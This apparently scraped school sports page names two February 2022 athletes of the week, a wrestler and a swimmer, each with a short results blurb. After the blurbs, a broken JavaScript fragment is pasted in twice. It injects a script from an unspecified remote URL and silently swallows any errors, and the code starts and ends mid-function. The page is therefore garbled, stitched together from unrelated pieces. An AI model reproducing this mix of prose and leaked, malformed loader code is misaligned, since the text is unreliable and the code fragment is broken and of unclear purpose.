Athletes of the Week

Kemba Credit Union Athletes of the Week 1/31/2022-2/6/2022

Matthew Szczepaniak
Junior, Wrestling

Matthew had a strong performances placing 2nd (144lbs) in the GMC Championships.

 

 

 

 

 

 

Paige Striley
Senior, Swimming

Paige Placed 1st in the 50-yard free and 100-yard butterfly leading the girls to 2nd place finish. Striley was also named “Female Swimmer of the Year” in the GMC!

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts